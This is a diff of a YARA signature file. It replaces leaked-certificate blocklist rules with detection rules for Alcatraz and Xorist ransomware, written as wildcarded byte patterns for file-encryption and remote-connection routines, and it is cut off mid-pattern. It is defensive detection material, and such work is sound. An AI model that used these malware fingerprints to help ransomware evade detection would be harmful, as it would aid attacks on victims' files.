+            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
+            ?? ?? 8D 45 ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF
+            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? C7 45 ?? ?? ??
+            ?? ?? 66 89 45 ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ??
+            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MINDSTORM LLC" and ( pe.signatures [ i ] . serial == "00:d1:83:6b:d3:7c:33:1a:67" or pe.signatures [ i ] . serial == "d1:83:6b:d3:7c:33:1a:67" ) and 1422835199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $ping_apnic and $remote_server_connection_1 and $remote_server_connection_2 and $remote_server_connection_3 and $remote_server_connection_4 and $encrypt_file
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2Ca028D1A4De0Eb743135Edecf74D7Af : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Alcatraz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Alcatraz ransomware."
 		author = "ReversingLabs"
-		id = "19e1bce7-ad37-5223-b934-b20e78dfd071"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7ff37483-ae63-5c82-a355-81ef68e2f663"
+		date = "2020-07-28"
+		modified = "2020-07-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1236-L1252"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Alcatraz.yara#L1-L91"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "60b6351194e23153d425eaa0c25f840080a29abb5eb1bbcd41bb76a3d4130edd"
+		logic_hash = "ddd35c8da0c08bce17cacfba8bb8a8b8a8c08c3e59261a88a79c63b03d29000f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Alcatraz"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2c:a0:28:d1:a4:de:0e:b7:43:13:5e:de:cf:74:d7:af" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Dbb14Dcf973Eada14Ece7Ea79C895C11 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "139f2e4f-7997-5cfd-aba2-dcf8d7525f5e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1254-L1270"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c73c83f5cb6d840b887e1aa41e96a29529f975434ac27a5aa57f2e14b342f63d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9
+            ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ??
+            ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
+            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ??
+            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 D0 85 D2 75 ?? 83 7D ?? ?? 74 ?? 6A
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            75 ?? 83 C8 ?? EB ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
+            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_server = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
+            7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 C2 ?? 52 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
+            55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 4D ?? 0F BE 11 83 FA ??
+            74 ?? 8B 45 ?? 03 45 ?? 0F BE 08 83 F9 ?? 74 ?? 8B 55 ?? 03 55 ?? 8B 45 ?? 03 45 ??
+            8A 08 88 0A EB ?? 8B 55 ?? 03 55 ?? C6 02 ?? EB ?? EB ?? EB ?? 83 7D ?? ?? 0F 87 ??
+            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52
+            FF 15 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_server_2 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? A1 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52
+            A1 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 0D ?? ?? ?? ?? 51 68
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
+            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 68
+            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 55 ??
+            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
+            45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8B 55 ?? 83
+            C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33
+            C0 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33
+            C0 EB ?? EB ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8B 4D ??
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 0F 87 ??
+            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51
+            FF 15 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "db:b1:4d:cf:97:3e:ad:a1:4e:ce:7e:a7:9c:89:5c:11" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server and $remote_server_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F8C2239De3977B8D4A3Dcbedc9031A51 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Xorist : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Xorist ransomware."
 		author = "ReversingLabs"
-		id = "3e102d0a-30e3-5f0a-9b67-a5fd15117e69"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "804ae039-fc3b-5f19-860e-df9efe87ee4d"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1272-L1288"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Xorist.yara#L1-L150"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa4f39790bc58b0a50e05e7670abad654d7f3d73e500bd5f054fece4a979ebfa"
+		logic_hash = "c428838cdd103f62508a23c9333b08567625291e110aa437324ecf37c62dca36"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Xorist"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_and_encrypt_v1_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
+            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C ?? 75 ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80
+        }
+		$search_and_encrypt_v1_p2 = {
+            3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? EB ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF
+        }
+		$search_and_encrypt_v1_p3 = {
+            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9
+            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 D0 C2 AA E2 ?? A1 ?? ?? ?? ?? 80
+            3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ??
+            ?? EB ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ??
+            ?? ?? C9 C3
+        }
+		$extract_rsrc_v1 = {
+            55 8B EC 83 C4 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 0F 31 5F 59 25 ?? ?? ?? ?? C1
+            E8 ?? 83 C0 ?? AA E2 ?? 33 C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 50 6A ?? E8 ??
+            ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3
+            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 6A ?? 6A
+            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 53 FF 75 ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
+            C9 C3
+        }
+		$search_and_encrypt_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
+            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C
+            ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8
+            ?? 74 ?? E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68
+        }
+		$search_and_encrypt_v2_p2 = {
+            E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F
+            84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ??
+            ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2
+            D0 C2 AA E2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? FF 75 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$extract_rsrc_v2 = {
+            55 8B EC 83 C4 ?? 53 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89
+            45 ?? 50 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? FF 75 ?? 6A ?? E8
+            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
+            ?? ?? ?? 89 45 ?? 8B F8 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 8B 45 ?? 83
+            E8 ?? 50 57 E8 ?? ?? ?? ?? 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03
+            FB 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ??
